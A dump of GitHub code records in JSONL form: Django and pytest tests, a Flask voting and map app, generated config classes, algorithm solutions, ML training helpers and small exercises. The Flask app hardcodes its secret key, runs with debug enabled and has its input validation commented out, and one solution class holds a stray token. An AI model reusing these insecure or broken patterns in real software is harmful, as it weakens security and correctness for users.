= numaraparitii.keys()\r\n if n in keys:\r\n numaraparitii[n] += 1 \r\n else:\r\n numaraparitii[n] = 1\r\n print(numaraparitii)\r\n print(numaraparitii.keys())\r\n print(numaraparitii.values())\r\n print(numaraparitii.items())\r\n \r\ndictionar_count(textul2)","repo_name":"elenacotan/Course5","sub_path":"Curs5_ex2.py","file_name":"Curs5_ex2.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17070542844","text":"import urllib.parse\n\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom tenancy.models import Tenant, TenantGroup\nfrom utilities.testing import create_test_user\n\n\nclass TenantGroupTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['tenancy.view_tenantgroup'])\n self.client = Client()\n self.client.force_login(user)\n\n TenantGroup.objects.bulk_create([\n TenantGroup(name='Tenant Group 1', slug='tenant-group-1'),\n TenantGroup(name='Tenant Group 2', slug='tenant-group-2'),\n TenantGroup(name='Tenant Group 3', slug='tenant-group-3'),\n ])\n\n def test_tenantgroup_list(self):\n\n url = reverse('tenancy:tenantgroup_list')\n\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n\n\nclass TenantTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['tenancy.view_tenant'])\n self.client = Client()\n self.client.force_login(user)\n\n tenantgroup = TenantGroup(name='Tenant Group 1', slug='tenant-group-1')\n tenantgroup.save()\n\n Tenant.objects.bulk_create([\n Tenant(name='Tenant 1', slug='tenant-1', group=tenantgroup),\n Tenant(name='Tenant 2', slug='tenant-2', group=tenantgroup),\n Tenant(name='Tenant 3', slug='tenant-3', group=tenantgroup),\n ])\n\n def test_tenant_list(self):\n\n url = reverse('tenancy:tenant_list')\n params = {\n \"group\": TenantGroup.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)), follow=True)\n self.assertEqual(response.status_code, 200)\n\n def test_tenant(self):\n\n tenant = Tenant.objects.first()\n response = self.client.get(tenant.get_absolute_url(), follow=True)\n self.assertEqual(response.status_code, 200)\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/tenancy/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13043359896","text":"from contextlib import contextmanager\nimport pytest\nfrom click.testing import CliRunner\nimport tasks.cli\nimport tasks.config\nfrom tasks.api import Task\n\n\n@contextmanager\ndef stub_tasks_db():\n yield\n\n\ndef test_list_no_args(mocker):\n # Replace the _tasks_db() context manager with our stub that does nothing.\n mocker.patch.object(tasks.cli, \"_tasks_db\", new=stub_tasks_db)\n\n # Replace any calls to tasks.list_tasks() from within tasks.cli to a default\n # MagicMock object with a return value of an empty list.\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=[])\n\n # Use the Click CliRunner to do the same thing as calling tasks list on the command\n # line.\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n\n # Use the mock object to make sure the API call was called correctly.\n # assert_called_once_with() is part of unittest.mock.Mock objects.\n tasks.cli.tasks.list_tasks.assert_called_once_with(None)\n\n\n@pytest.fixture()\ndef no_db(mocker):\n \"\"\"Put the mock stubbing of _tasks_db into a fixture so we can reuse it more easily\n in future tests.\"\"\"\n mocker.patch.object(tasks.cli, \"_tasks_db\", new=stub_tasks_db)\n\n\ndef test_list_print_empty(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=[])\n runner = CliRunner()\n result = runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n expected_output = (\n \" ID owner done summary\\n\" \" -- ----- ---- -------\\n\"\n )\n\n # Check the output of the command-line action\n assert result.output == expected_output\n\n\ndef test_list_print_many_items(no_db, mocker):\n many_tasks = (\n Task(\"write chapter\", \"Brian\", True, 1),\n Task(\"edit chapter\", \"Katie\", False, 2),\n Task(\"modify chapter\", \"Brian\", False, 3),\n Task(\"finalize chapter\", \"Katie\", False, 4),\n )\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\", return_value=many_tasks)\n runner = CliRunner()\n result = runner.invoke(tasks.cli.tasks_cli, [\"list\"])\n expected_output = (\n \" ID owner done summary\\n\"\n \" -- ----- ---- -------\\n\"\n \" 1 Brian True write chapter\\n\"\n \" 2 Katie False edit chapter\\n\"\n \" 3 Brian False modify chapter\\n\"\n \" 4 Katie False finalize chapter\\n\"\n )\n assert result.output == expected_output\n\n\ndef test_list_dash_o(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\")\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\", \"-o\", \"brian\"])\n tasks.cli.tasks.list_tasks.assert_called_once_with(\"brian\")\n\n\ndef test_list_dash_dash_owner(no_db, mocker):\n mocker.patch.object(tasks.cli.tasks, \"list_tasks\")\n runner = CliRunner()\n runner.invoke(tasks.cli.tasks_cli, [\"list\", \"--owner\", \"okken\"])\n tasks.cli.tasks.list_tasks.assert_called_once_with(\"okken\")\n","repo_name":"jashburn8020/python-testing-with-pytest","sub_path":"ch7/tasks_proj_v2/tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"72"} +{"seq_id":"32384860796","text":"from flask import Flask, render_template, redirect, request, session, url_for, flash\nimport re\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func\nfrom flask_migrate import Migrate\nfrom flask_bcrypt import Bcrypt\nfrom flask import json\n\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///quarantine_friends.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\napp.secret_key = 'secret key'\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\nbcrypt = Bcrypt(app)\n\n\nupvote_table = db.Table('upvotes', \n db.Column('user_id', db.Integer, db.ForeignKey('user.id', ondelete='cascade'), primary_key=True), \n db.Column('item_id', db.Integer, db.ForeignKey('item.id', ondelete='cascade'), primary_key=True))\n\ndownvote_table = db.Table('downvotes', \n db.Column('user_id', db.Integer, db.ForeignKey('user.id', ondelete='cascade'), primary_key=True), \n db.Column('item_id', db.Integer, db.ForeignKey('item.id', ondelete='cascade'), primary_key=True))\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n first_name = db.Column(db.String(255))\n last_name = db.Column(db.String(255))\n email = db.Column(db.String(255))\n password = db.Column(db.String(255))\n items_this_user_upvoted = db.relationship('Item', secondary=upvote_table)\n items_this_user_downvoted = db.relationship('Item', secondary=downvote_table)\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\nclass Item(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n category = db.Column(db.String(255))\n lat = db.Column(db.String(255))\n lng = db.Column(db.String(255))\n votes = db.Column(db.Integer, default=0)\n users_who_upvoted_this_item = db.relationship('User', secondary=upvote_table)\n users_who_downvoted_this_item = db.relationship('User', secondary=downvote_table)\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\nclass Comment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(255))\n author_id = db.Column(db.Integer, db.ForeignKey(\"user.id\", ondelete=\"cascade\"), nullable=False)\n author = db.relationship('User', foreign_keys=[author_id], backref=\"user_comments\")\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\nclass Feedback(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(255))\n authors_id = db.Column(db.Integer, db.ForeignKey(\"user.id\", ondelete=\"cascade\"), nullable=False)\n authors = db.relationship('User', foreign_keys=[authors_id], backref=\"user_feedback\")\n created_at = db.Column(db.DateTime, server_default=func.now())\n updated_at = db.Column(db.DateTime, server_default=func.now(), onupdate=func.now())\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/on_signup', methods=['POST'])\ndef on_register():\n is_valid = True\n\n # validations\n # add check for existing user\n # if len(request.form['first_name']) < 3:\n # is_valid = False\n # flash('First name is too short', 'signup')\n # if len(request.form['last_name']) < 3:\n # is_valid = False\n # flash('Last name is too short', 'signup')\n # if not EMAIL_REGEX.match(request.form['email']):\n # is_valid = False\n # flash(\"Invalid email address\", 'signup')\n # if len(request.form['password']) < 6:\n # is_valid = False\n # flash('Password must be at least 6 characters', 'signup')\n # if request.form['password'] != request.form['confirm_password']:\n # is_valid = False\n # flash('Passwords do not match', 'signup')\n\n if is_valid:\n pw_hash = bcrypt.generate_password_hash(request.form['password'])\n new_user = User(first_name=request.form['first_name'], last_name=request.form['last_name'], email=request.form['email'], password=pw_hash)\n db.session.add(new_user)\n db.session.commit()\n user = User.query.filter_by(email=request.form['email']).first()\n session['userid'] = user.id\n return render_template('home.html', user = user)\n else:\n return redirect('/')\n\n@app.route('/on_login', methods=['post'])\ndef on_login():\n \n user = User.query.filter_by(email=request.form['email']).first()\n if user == None:\n flash('Could not log in')\n return redirect('/')\n elif bcrypt.check_password_hash(user.password, request.form['password']):\n session['userid'] = user.id\n return redirect('/dashboard')\n\n@app.route('/dashboard') #had to add a 'dashboard route' after login/signup because there was no way to come back to main page after you left main page after login.- Brian\ndef dashboard(): \n results = User.query.filter_by(id=session['userid']).all()\n return render_template('home.html', user=results[0])\n\n\n\n@app.route('/edit')\ndef edit():\n results = User.query.get(session['userid'])\n return render_template('edit.html', user = results)\n\n@app.route('/on_edit', methods=['post'])\ndef on_edit():\n user_update = User.query.get(session['userid'])\n if user_update:\n user_update.first_name = request.form['first_name']\n user_update.last_name = request.form['last_name']\n user_update.email = request.form['email']\n user_update.password = bcrypt.generate_password_hash(request.form['password'])\n db.session.commit()\n return redirect('/dashboard')\n else:\n return redirect('/edit')\n\n\n\n\n\n# start of routes under construction\n@app.route('/on_upvote/')\ndef on_upvote(id):\n item = Item.query.get(id)\n user = User.query.get(session['userid'])\n\n if item in user.items_this_user_downvoted:\n user.items_this_user_downvoted.remove(item)\n db.session.commit()\n print('user removed from downvote list')\n\n user.items_this_user_upvoted.append(item)\n db.session.commit()\n print('user added to upvote list')\n\n item.votes +=1\n db.session.commit()\n print('votes increased by 1')\n\n print('upvote process complete')\n return redirect('/test')\n\n@app.route('/on_downvote/')\ndef on_unlike(id):\n item = Item.query.get(id)\n user = User.query.get(session['userid'])\n\n if item in user.items_this_user_upvoted:\n user.items_this_user_upvoted.remove(item)\n db.session.commit()\n print('user removed from upvote list')\n\n user.items_this_user_downvoted.append(item)\n db.session.commit()\n print('user added to downvote list')\n\n item.votes -=1\n db.session.commit()\n print('votes reduced by 1')\n\n print('downvote process complete')\n return redirect('/test')\n\n@app.route('/on_comment', methods=['POST'])\ndef on_comment():\n comment = Comment(content=request.form['comment'], author_id=session['userid'])\n db.session.add(comment)\n db.session.commit()\n return redirect('/test')\n\n# end of routes under construction\n\n\n\n\n\n@app.route('/on_logout')\ndef logout():\n session.clear()\n return redirect('/')\n\n@app.route('/test')\ndef test():\n # checks if user is logged in\n if 'userid' not in session:\n return redirect('/')\n\n user = User.query.get(session['userid'])\n items = Item.query.all()\n\n markers = []\n \n if items:\n\n # get logged in user info\n for item in items:\n\n # doesn't add item if less than 0 votes\n if item.votes >= 0:\n temp = {}\n\n # set coords of item\n coords = {\n 'lat' : float(item.lat),\n 'lng' : float(item.lng)\n }\n\n # checks category and sets correct iconImage\n if item.category == 'toiletPaper':\n iconImage = 'https://i.ibb.co/Zx24VKX/toilet-Paper.png'\n\n # sets correct voting links\n if user in item.users_who_upvoted_this_item:\n content = '

Votes: %s

' % (item.votes, item.id)\n elif user in item.users_who_downvoted_this_item:\n content = '

Votes: %s

' % (item.votes, item.id)\n else:\n content = '

Votes: %s

' % (item.votes, item.id, item.id)\n \n # updates object to marker list\n temp.update({\n 'coords' : coords,\n 'iconImage' : iconImage,\n 'content' : content\n })\n markers.append(temp)\n \n comments = Comment.query.all()\n\n return render_template('test.html', markers=markers, comments=comments)\n\n@app.route('/on_test', methods=['POST'])\ndef ontest():\n print(request.form)\n new_item = Item(category=request.form['category'], lat=request.form['lat'], lng=request.form['lng'])\n db.session.add(new_item)\n db.session.commit()\n return redirect('/test')\n\n#feedback routes\n@app.route('/feedback')\ndef feedback_page():\n reviews = Feedback.query.all()\n return render_template('feedback.html', reviews=reviews)\n\n@app.route('/on_feedback', methods=['post'])\ndef on_feedback():\n new_feedback = Feedback(content=request.form['reviews'], authors_id=session['userid'])\n if new_feedback:\n db.session.add(new_feedback)\n db.session.commit()\n return redirect('/feedback')\n else:\n return redirect('/feedback')\n#end feedback routes\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"JustinGillis/Quarantine-Friends","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3628532057","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\n\nimport socket\n\nfrom a.api.yang.modules.tech.common.qwilt_tech_storage_module.qwilt_tech_storage_module_module_gen import StorageModuleLocationTypeType\n\n\nclass SystemDefaultsData(object):\n\n def __init__ (self):\n\n self.controller = \"\"\n self._myHasController=False\n \n self.enabled = False\n self._myHasEnabled=False\n \n self.description = \"\"\n self._myHasDescription=False\n \n self.locationType = StorageModuleLocationTypeType.kNone\n self._myHasLocationType=False\n \n\n def copyFrom (self, other):\n\n self.controller=other.controller\n self._myHasController=other._myHasController\n \n self.enabled=other.enabled\n self._myHasEnabled=other._myHasEnabled\n \n self.description=other.description\n self._myHasDescription=other._myHasDescription\n \n self.locationType=other.locationType\n self._myHasLocationType=other._myHasLocationType\n \n # has...() methods\n\n def hasController (self):\n return self._myHasController\n\n def hasEnabled (self):\n return self._myHasEnabled\n\n def hasDescription (self):\n return self._myHasDescription\n\n def hasLocationType (self):\n return self._myHasLocationType\n\n\n # setHas...() methods\n\n def setHasController (self):\n self._myHasController=True\n\n def setHasEnabled (self):\n self._myHasEnabled=True\n\n def setHasDescription (self):\n self._myHasDescription=True\n\n def setHasLocationType (self):\n self._myHasLocationType=True\n\n\n def clearAllHas (self):\n\n self._myHasController=False\n\n self._myHasEnabled=False\n\n self._myHasDescription=False\n\n self._myHasLocationType=False\n\n\n def __str__ (self):\n items=[]\n\n x=\"\"\n if self._myHasController:\n x = \"+\"\n leafStr = str(self.controller)\n items.append(x + \"Controller=\"+leafStr)\n\n x=\"\"\n if self._myHasEnabled:\n x = \"+\"\n leafStr = str(self.enabled)\n items.append(x + \"Enabled=\"+leafStr)\n\n x=\"\"\n if self._myHasDescription:\n x = \"+\"\n leafStr = str(self.description)\n items.append(x + \"Description=\"+leafStr)\n\n x=\"\"\n if self._myHasLocationType:\n x = \"+\"\n leafStr = str(self.locationType)\n items.append(x + \"LocationType=\"+leafStr)\n\n return \"{SystemDefaultsData: \"+\",\".join(items)+\"}\"\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"className\": \"SystemDefaultsData\", \n \"namespace\": \"system_defaults\", \n \"importStatement\": \"from a.api.yang.modules.tech.common.qwilt_tech_storage_module.tech.storage.module.system_defaults.system_defaults_data_gen import SystemDefaultsData\"\n }, \n \"ancestors\": [\n {\n \"namespace\": \"tech\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"storage\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"module\", \n \"isCurrent\": false\n }, \n {\n \"namespace\": \"system_defaults\", \n \"isCurrent\": true\n }\n ], \n \"conditionalDebugName\": null, \n \"leaves\": [\n {\n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"controller\", \n \"yangName\": \"controller\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: BoolPyHandler\", \n \"memberName\": \"enabled\", \n \"yangName\": \"enabled\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"false\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"description\", \n \"yangName\": \"description\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"\", \n \"hasDefaultRef\": false\n }, \n {\n \"typeHandler\": \"handler: EnumHandlerPy\", \n \"memberName\": \"locationType\", \n \"yangName\": \"location-type\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": \"none\", \n \"hasDefaultRef\": false\n }\n ], \n \"module\": {}, \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"api\", \n \"yang\", \n \"modules\", \n \"tech\", \n \"common\", \n \"qwilt_tech_storage_module\"\n ]\n }, \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/api/yang/modules/tech/common/qwilt_tech_storage_module/tech/storage/module/system_defaults/system_defaults_data_gen.py","file_name":"system_defaults_data_gen.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36307015302","text":"class Trie:\n def __init__(self):\n self.node = {}\n self.end = '*'\n self.cache = {}\n \n def add(self, word):\n node = self.node\n for ch in word:\n if ch not in node:\n node[ch] = {}\n node = node[ch]\n node[self.end] = True\n \n def word_break(self, word, idx, node=None, depth=0):\n depth += 1\n if (idx, depth) not in self.cache:\n node = node or self.node\n ch = word[idx]\n if idx >= len(word)-1:\n self.cache[(idx, depth)] = ch in node and self.end in node[ch]\n elif ch not in node:\n self.cache[(idx, depth)] = False\n elif self.end in node[ch]:\n self.cache[(idx, depth)] = (\n self.word_break(word, idx+1, node[ch], depth)\n or self.word_break(word, idx+1, self.node, 0)\n )\n else:\n self.cache[(idx, depth)] = self.word_break(word, idx+1, node[ch], depth)\n return self.cache[(idx, depth)]\n \n\nclass Solution:\n a\n def wordBreak(self, s: str, word_dict) -> bool:\n trie = Trie()\n [trie.add(word) for word in word_dict]\n return trie.word_break(s, 0)\n\n\n### Ingenious and fast solution from submitted\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n X = {}\n def wordBreak_(x):\n if x not in X:\n X[x] = False\n for word in wordDict:\n if x.startswith(word):\n n = len(word)\n if len(x) == n or wordBreak_(x[n:]):\n X[x] = True\n break\n \n return X[x]\n \n return wordBreak_(s)\n","repo_name":"tonymontaro/leetcode-hints","sub_path":"problems/word-break/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41038122741","text":"from preprocess.util import *\n\nclass FeatureGenerator(object):\n def produce_mapping_dict(self, ts, exp_id):\n trans_to_int = dict()\n int_to_trans = dict()\n states_to_int = dict()\n int_to_states = dict()\n i = 0\n j = 0\n for ai in ts:\n states_to_int[ai] = i\n int_to_states[i] = ai\n i+=1\n for aj in ts[ai]['outgoings']:\n trans_name = \"/\".join((ai,aj))\n trans_to_int[trans_name] = j\n int_to_trans[j] = trans_name\n j+=1\n save_obj(trans_to_int, \"trans_to_int_{}\".format(exp_id))\n save_obj(int_to_trans, \"int_to_trans_{}\".format(exp_id))\n save_obj(states_to_int, \"states_to_int_{}\".format(exp_id))\n save_obj(int_to_states, \"int_to_states_{}\".format(exp_id))\n\n return trans_to_int, int_to_trans, states_to_int, int_to_states\n\n def produce_states_list(self, ts):\n all_nodes = list(set([ai for ai in ts]))\n all_nodes.remove('START')\n all_nodes = sorted(all_nodes)\n return all_nodes\n\n def produce_window(self, start, end, range_days=0, range_seconds=0, stride_days=0, stride_seconds=0):\n import datetime\n window_list = list()\n range_timedelta = datetime.timedelta(range_days, range_seconds)\n stride_timedelta = datetime.timedelta(stride_days, stride_seconds)\n start, end = get_dt_from_string(start), get_dt_from_string(end)\n dt1, dt2 = start, start\n while dt2 < end:\n dt2 = dt1 + range_timedelta\n str_dt1 = get_string_from_dt(dt1)\n str_dt2 = get_string_from_dt(dt2)\n window_list.append((str_dt1, str_dt2))\n dt1 = dt1 + stride_timedelta\n return window_list\n\n def replay_log(self, TM, window_list, eventlog, transition_matrix, start_time, complete_time, measure='processing', agg='avg'):\n replay_list = list()\n for dt1, dt2 in window_list:\n #only complete timestamp\n if start_time == 'default':\n filtered_log = filter_log_by_timestamp(eventlog, start_time=start_time, complete_time=complete_time, dt1=dt1, dt2=dt2)\n else:\n filtered_log = filter_log_by_timestamp_with_start(eventlog, start_time=start_time, complete_time=complete_time, dt1=dt1, dt2=dt2, measure=measure, agg=agg)\n perf_measure = '{}_{}'.format(agg, measure)\n annotated_ts = TM.clear_annotation(transition_matrix, perf_measure)\n\n #measurements\n if measure == 'processing':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='processing')\n elif measure == 'waiting':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='waiting')\n elif measure == 'sojourn':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='sojourn')\n\n #aggregation\n if agg == 'avg':\n annotated_ts = compute_avg_time(annotated_ts, measure)\n elif agg == 'length':\n timestamp_vals = filtered_log.get_col_values('TIMESTAMP')\n log_start_at = min(timestamp_vals)\n log_end_at = max(timestamp_vals)\n log_range = log_end_at-log_start_at\n annotated_ts = compute_avg_queue_len(annotated_ts, measure, log_range)\n elif agg == 'count':\n annotated_ts = compute_cnt(annotated_ts, measure)\n elif agg == 'std':\n annotated_ts = compute_std_time(annotated_ts, measure)\n replay_list.append(annotated_ts)\n return replay_list\n\n\n def produce_2d_feature_vector(self, ts_list, perf_measure, trans_to_int, int_to_trans):\n #(num_trans, num_window)\n feature_vector = list()\n num_acrs = 0\n i = 0\n num_acrs += len(trans_to_int)\n #print(\"num arcs: {}\".format(num_acrs))\n for ts in ts_list:\n t_row = [0 for x in range(num_acrs)]\n for ai in ts:\n for aj in ts[ai]['outgoings']:\n trans_name = \"/\".join((ai,aj))\n if trans_name in trans_to_int:\n val = ts[ai]['outgoings'][aj][perf_measure]\n #print(\"{}->{}: {}\".format(ai,aj,val))\n idx = trans_to_int[trans_name]\n t_row[idx] = val\n else:\n continue\n t_row = np.array(t_row)\n t_row = np.hstack(t_row)\n feature_vector.append(t_row)\n feature_vector=np.array(feature_vector)\n print(feature_vector)\n return feature_vector\n\n def produce_2d_state_feature_vector(self, ts_list, perf_measure, states_to_int, int_to_states):\n #(num_trans, num_window)\n\n feature_vector = list()\n num_nodes = len(states_to_int)\n for ts in ts_list:\n t_row = [0 for x in range(num_nodes)]\n for ai in ts:\n if ai in states_to_int:\n val = ts[ai][perf_measure]\n idx = states_to_int[ai]\n t_row[idx] = val\n else:\n continue\n t_row = np.array(t_row)\n t_row = np.hstack(t_row)\n feature_vector.append(t_row)\n feature_vector=np.array(feature_vector)\n return feature_vector\n\n\n\n def produce_3d_samples(self, fv, input_size=1, output_size=1):\n #generate (samples, num_trans, num_window)\n X_train = list()\n y_train = list()\n for i in range(0,fv.shape[0]-input_size-output_size+1,1):\n X = fv[i:i+input_size,:]\n y = fv[i+input_size:i+input_size+output_size,:]\n X_train.append(X)\n y_train.append(y)\n X_train=np.array(X_train)\n y_train=np.array(y_train)\n return X_train, y_train\n\n def produce_3d_feature_vector(self, ts_list, perf_measure, states_to_int, int_to_states):\n #(num_window, num_nodes, num_nodes)\n feature_vector = list()\n\n all_nodes = list(states_to_int.keys())\n\n #print(\"num arcs: {}\".format(num_acrs))\n list_of_trans_mat = list()\n for ts in ts_list:\n list_of_lists = list()\n for ai in all_nodes:\n if ai not in ts:\n val_list = [0] * len(all_nodes)\n continue\n val_list = list()\n for aj in all_nodes:\n if aj in ts[ai]['outgoings'].keys():\n val_list.append(ts[ai]['outgoings'][aj][perf_measure])\n else:\n val_list.append(0)\n list_of_lists.append(val_list)\n list_of_trans_mat.append(list_of_lists)\n array_of_trans_mat = np.array(list_of_trans_mat)\n return array_of_trans_mat\n\n\n def produce_4d_samples(self, fv, input_size=3, output_size=1):\n #generate (samples, num_nodes, num_nodes, num_window)\n X_train = list()\n y_train = list()\n for i in range(0,fv.shape[0]-input_size-output_size+1,1):\n X = fv[i:i+input_size,:,:]\n y = fv[i+input_size:i+input_size+output_size,:,:]\n X_train.append(X)\n y_train.append(y)\n X_train=np.array(X_train)\n y_train=np.array(y_train)\n return X_train, y_train\n","repo_name":"gyunamister/performance_prediction","sub_path":"preprocess/feature_generator.py","file_name":"feature_generator.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42449920726","text":"\"\"\"\n Functions that are used to train and test our framework.\n Some of them have a version with minibatches and other without them.\n\"\"\"\nfrom torch import empty as empty\nfrom torch import set_grad_enabled\nfrom torch import int64, float32 # necessary to generate data\nfrom math import sqrt, pi\n\n\nset_grad_enabled(False)\n\n\n################################################################################\n# Generating training and testing set of nb 2D points. They are sampled \n# uniformly in (0,1), and the labels are marked with 1 if the points are inside\n# the disk centered at (0.5, 0.5) of radius 1/sqrt(2*pi). If not, are marked as 0\n################################################################################\ndef generate_disc_set(nb): \n\n input = empty(nb,2, dtype = float32).uniform_(0.0,1.0)\n input_norm = (input - 0.5).pow(2).sum(dim=1).sqrt()\n output = empty(nb, dtype = int64)\n output[:] = 0\n output[input_norm < 1/sqrt(2*pi)] = 1\n \n return input, output\n\n\n\n################################################################################\n# This function computes the number of missclassified values. \n# Compatible with our framework methods. It doesn't work when using minibatches.\n################################################################################\ndef compute_nb_errors(model, input, target):\n\n nb_data_errors = 0\n\n predicted_target = empty(target.shape)\n\n for i, element in enumerate(input):\n output = model.forward(element)\n if (output[0] > output[1]):\n predicted_classes = 0\n else:\n predicted_classes = 1\n\n if target[i,predicted_classes] == 0:\n nb_data_errors = nb_data_errors + 1\n \n predicted_target[i] = predicted_classes\n\n return nb_data_errors, predicted_target\n\n\n################################################################################\n# This function computes the number of missclassified values. \n# Compatible with our framework methods. It works with minibatches.\n################################################################################\ndef compute_nb_errors_minibatch(model, input, target, minibatch_size):\n nb_errors = 0\n\n predicted_target = empty(target.shape[0])\n\n for b in range(0, input.size(0), minibatch_size):\n output = model.forward(input.narrow(0, b, minibatch_size))\n _, predicted_classes = output.max(1)\n for k in range(minibatch_size):\n if target[b + k, predicted_classes[k]] <= 0:\n nb_errors = nb_errors + 1\n \n predicted_target[b:b+minibatch_size] = predicted_classes\n\n return nb_errors, predicted_target\n\n\n\n################################################################################\n# Training function compatible with our framework. \n# It works without minibatches, applying each data point\n# independently to the model. \n# Logs the error every 20 epochs and return a tensor with all the losses.\n################################################################################\ndef train(mod, criterion, train_input, train_target_hot_label, nb_epochs, eta):\n\n nb_train_samples = train_input.shape[0]\n \n losses = empty(nb_epochs)\n\n for e in range(nb_epochs):\n\n loss_sum = 0\n\n for i in range(0,nb_train_samples):\n \n pred = mod.forward(train_input[i])\n loss = criterion.forward(pred,train_target_hot_label[i])\n \n loss_sum += loss.item()\n\n grad_loss = criterion.backward(pred,train_target_hot_label[i])\n mod.backward(grad_loss)\n for p in mod.param():\n p.p -= eta * p.gradient\n\n if e % 20 == 0:\n print(\"Loss at epoch \", e , \": \" , loss_sum)\n\n losses[e] = loss_sum\n \n return losses\n\n\n\n################################################################################\n# Training function compatible with our framework. \n# It works dividing the training data in minibatches, therefore improving the performance.\n# Logs the error every 20 epochs and return a tensor with all the losses.\n################################################################################\ndef train_minibatch(mod, criterion, train_input, train_target_hot_label, nb_epochs, eta, minibatch_size):\n nb_train_samples = train_input.shape[0]\n\n losses = empty(nb_epochs)\n\n for e in range(nb_epochs):\n\n loss_sum = 0\n\n for b in range(0,nb_train_samples, minibatch_size):\n \n pred = mod.forward(train_input.narrow(0, b, minibatch_size))\n loss = criterion.forward(pred,train_target_hot_label.narrow(0, b, minibatch_size))\n \n loss_sum += loss.item()\n\n grad_loss = criterion.backward(pred,train_target_hot_label.narrow(0, b, minibatch_size))\n mod.backward(grad_loss)\n for p in mod.param():\n p.p -= eta * p.gradient\n\n if e % 20 == 0:\n print(\"Loss at epoch \", e , \": \" , loss_sum)\n\n losses[e] = loss_sum\n \n return losses","repo_name":"RaphaelUebersax/Deep-Learning-course","sub_path":"Projects/Proj2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34893918038","text":"#healthy status check\nheight=float(input(\"enter your height in m:\"))\nweight=float(input(\"enter your weight in kg:\"))\nBMI=round(weight/(height*height))\nif BMI<18.5:\n print(f\"your BMI is:{BMI},you are underweight\")\nelif BMI<25:\n print(f\"your BMI is:{BMI},you have a normal weight\")\nelif BMI<30:\n print(f\"your BMI is:{BMI},you are overweight\")\nelif BMI<35:\n print(f\"your BMI is:{BMI},you are obese\")\nelse:\n print(f\"your BMI is:{BMI},you are clinically obese\")\n#year check project\nfrom operator import 